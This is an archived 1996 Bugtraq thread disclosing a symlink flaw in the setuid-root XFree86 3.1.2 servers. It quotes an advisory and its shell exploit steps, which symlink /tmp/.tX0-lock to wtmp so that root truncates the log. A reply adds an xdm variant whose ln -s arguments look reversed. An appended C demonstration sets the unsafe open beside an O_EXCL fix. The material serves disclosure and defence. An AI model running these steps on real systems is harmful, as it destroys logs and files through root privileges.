Bugtraq mailing list archives
Re: XFree86 3.1.2 Security Problems
From: frantic () worldnet net (Anthony C. Zboralski)
Date: Tue, 30 Jan 1996 02:51:40 +0100
-----BEGIN PGP SIGNED MESSAGE-----

On Mon, 29 Jan 1996, David J Meltzer wrote:

> Date: Mon, 29 Jan 1996 00:16:46 -0500
> From: David J Meltzer <davem+ () andrew cmu edu>
> To: Multiple recipients of list BUGTRAQ <BUGTRAQ () CRIMELAB COM>
> Subject: XFree86 3.1.2 Security Problems
>
> There are security holes in XFree86 3.1.2, which installs its servers as
> suid root (/usr/X11R6/bin/XF86_*). When reading and writing files, it
> does not take proper precautions to ensure that file permissions are
> maintained, resulting in the ability to overwrite files, and to read
> limited portions of other files.
>
> The first problem stems from the server opening a temporary file,
> /tmp/.tX0-lock, with mode (O_WRONLY|O_CREAT|O_TRUNC). By making this
> file a symlink, the server will overwrite the original file, and then
> write to it its current pid.
>
> Other problems exist in the server relating to similar problems; one
> such example is the ability to specify an arbitrary file for the
> XF86Config file, which will then be opened, and the first line that
> fails to match the expected format will be output with an error,
> allowing a line to be read from an arbitrary file.
>
> Program:                    XFree86 3.1.2 servers
> Affected Operating Systems: All systems with XFree86 3.1.2 installed
> Requirements:               account on system
> Temporary Patch:            chmod o-x /usr/X11R6/bin/XF86*
> Security Compromise:        overwrite arbitrary files
> Author:                     Dave M. (davem () cmu edu)
> Synopsis:                   While running suid root, XFree86 servers do
>                             not properly check file permissions, allowing
>                             a user to overwrite arbitrary files on a system.
>
> Exploit:
>
>   $ ls -l /var/adm/wtmp
>   -rw-r--r--   1 root     root       174104 Dec 30 08:31 /var/adm/wtmp
>   $ ln -s /var/adm/wtmp /tmp/.tX0-lock
>   $ startx
>   (At this point exit X if it started, or else ignore any error messages)
>   $ ls -l /var/adm/wtmp
>   -r--r--r--   1 root     root           11 Dec 30 08:33 /var/adm/wtmp

Oh well, if xdm is running, the temporary patch won't do you any good...

Xdm manages a collection of X displays, which may be on the local host or
remote servers. Xdm provides services similar to those provided by init,
getty and login on character terminals: prompting for login name and
password, authenticating the user, and running a ``session.''

Xdm is launched by root; by default it will start a server on the local
display. If the server crashes for some reason, gets killed, or if the user
sends a server abort sequence, it will restart the server.

  $ ps -ax | grep xdm
    80  ?   S    0:00 xdm
   142  ?   S    0:01 /usr/X11R6/bin/X -auth /usr/X11R6/lib/X11/xdm/A:0-a00080
   179  v03 D    0:00 grep xdm
  $ ls -l /var/log/wtmp
  -rw-r--r--   1 root     root        31864 Jan 30 02:13 /var/log/wtmp
  $ ln -s /tmp/.tX0-lock /var/log/wtmp

Now, you switch to the local X display and send the <Ctrl><Alt><BS> server
abort sequence. Wait until xdm pops up a new server process, then switch
back to the shell:

  $ ls -l /var/log/wtmp
  -rw-r--r--   1 root     root           11 Jan 30 02:13 /var/log/wtmp

Xdm doesn't need to kill the server when a user logs out, so the only worry
would be the sending of the abort sequence, easily fixed by uncommenting the
"DontZap" setting in /etc/XF86Config... but I have seen XF86 crashing so
many times for unguessable reasons that I don't think it will fix the prob.

Maybe someone could take a look at the server sources so it does a
system("/bin/rm /tmp/.tX0-lock") just before it writes to the file... I
don't have 'em handy...

 ____
 \ /__   Anthony C. Zboralski <frantic () worldnet net>
  \/ / \/  Finger <frantic () webbar imaginet fr> for PGP Public Key

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv
Comment: France, Russia and Irak still forbid encryption..

iQCVAwUBMQ141V/59mQ4I551AQGVEgP/aO3+dCX8FA/2sNOeaE6p33u2+Ed1yuPM
2NyI14L3q1RQ7xt8seHQD1KzWxvRJxbSvWKhrIdhSuisAzlh8QJdn4hZ8ulgPNBf
uesUvAbvVJjhhandT0wjVbL0rYRBJEs9NJtWTrrF/gZ+5+cuvnKM2iyeTcAY9EGL
2MvbAtN6yr4=
=EwzG
-----END PGP SIGNATURE-----
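The lock-file creation this thread is about, as an added example that is not XFree86's code and not from either poster: the O_TRUNC open the report describes, beside a form that opens with O_CREAT|O_EXCL, which POSIX requires to fail on any existing path, a symlink included, so nothing the link points at is touched. The harness (a private directory under /tmp, a 40-byte "wtmp" stand-in, a link planted at the lock path) is constructed for the demonstration and runs unprivileged; the pid line format is an assumption.

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <sys/stat.h>
#include <unistd.h>

/* Write the pid in a fixed-width form (assumed format); "%10ld\n" is 11 bytes,
 * the length the report's truncated wtmp ended up with. */
static int write_pid(int fd) {
    char buf[32];
    int n = snprintf(buf, sizeof buf, "%10ld\n", (long)getpid());
    return (n > 0 && write(fd, buf, (size_t)n) == n) ? 0 : -1;
}

/* 'Before': the open the report describes. With O_TRUNC and no exclusivity,
 * a symlink sitting at the lock path is followed, its target is truncated,
 * and the pid lands in the target. Returns the fd or -1. */
static int lockfile_open_unsafe(const char *path) {
    int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, 0644);
    if (fd >= 0 && write_pid(fd) != 0) { close(fd); return -1; }
    return fd;
}

/* Hardened form: O_CREAT|O_EXCL makes open() fail with EEXIST whenever the
 * path already exists, and POSIX requires that failure even when the existing
 * entry is a symlink, whatever it points at. The existence check and the
 * create happen inside one system call, so there is no window to race. */
static int lockfile_open_safe(const char *path) {
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL, 0644);
    if (fd < 0) return -1;               /* EEXIST: lock held, stale, or planted */
    if (write_pid(fd) != 0) { close(fd); unlink(path); return -1; }
    return fd;
}

/* Constructed harness: a private directory under /tmp, a 'wtmp' stand-in
 * holding 40 bytes, and a symlink at the lock path pointing at it. Runs the
 * given opener against the link and returns the stand-in's size afterwards
 * (40 means untouched), or -1 if setup fails. Needs no privileges. */
static long victim_size_after(int (*opener)(const char *), const char *tag) {
    char dir[96], victim[160], lock[160];
    snprintf(dir, sizeof dir, "/tmp/lockdemo.%s.%ld", tag, (long)getpid());
    if (mkdir(dir, 0700) != 0 && errno != EEXIST) return -1;
    snprintf(victim, sizeof victim, "%s/wtmp", dir);
    snprintf(lock, sizeof lock, "%s/.tX0-lock", dir);
    unlink(lock);                        /* start clean */

    const char payload[] = "0123456789012345678901234567890123456789"; /* 40 bytes */
    int vfd = open(victim, O_WRONLY | O_CREAT | O_TRUNC, 0644);
    if (vfd < 0) return -1;
    if (write(vfd, payload, 40) != 40) { close(vfd); return -1; }
    close(vfd);

    if (symlink(victim, lock) != 0) return -1;  /* the planted link */

    int fd = opener(lock);
    if (fd >= 0) close(fd);

    struct stat st;
    long size = (lstat(victim, &st) == 0) ? (long)st.st_size : -1;
    unlink(lock); unlink(victim); rmdir(dir);
    return size;
}

/* The safe opener on a path where nothing exists yet: returns the lock
 * file's size (11 for the pid line) or -1. */
static long safe_lock_fresh(void) {
    char dir[96], lock[160];
    snprintf(dir, sizeof dir, "/tmp/lockdemo.fresh.%ld", (long)getpid());
    if (mkdir(dir, 0700) != 0 && errno != EEXIST) return -1;
    snprintf(lock, sizeof lock, "%s/.tX0-lock", dir);
    unlink(lock);
    int fd = lockfile_open_safe(lock);
    if (fd < 0) return -1;
    close(fd);
    struct stat st;
    long size = (lstat(lock, &st) == 0) ? (long)st.st_size : -1;
    unlink(lock); rmdir(dir);
    return size;
}

int main(void) {
    printf("O_TRUNC open through planted link: target now %ld bytes\n",
           victim_size_after(lockfile_open_unsafe, "unsafe"));
    printf("O_EXCL open through planted link:  target still %ld bytes\n",
           victim_size_after(lockfile_open_safe, "safe"));
    printf("O_EXCL open on a fresh path:       lock file is %ld bytes\n",
           safe_lock_fresh());
    return 0;
}
```

Removing the lock file immediately before the open still leaves a gap between the unlink and the open in which a link can be put back; O_EXCL moves the existence test into the open() itself. A lock that exists but whose recorded pid is no longer running is then handled by unlinking it and retrying the exclusive open, never by truncating through the path.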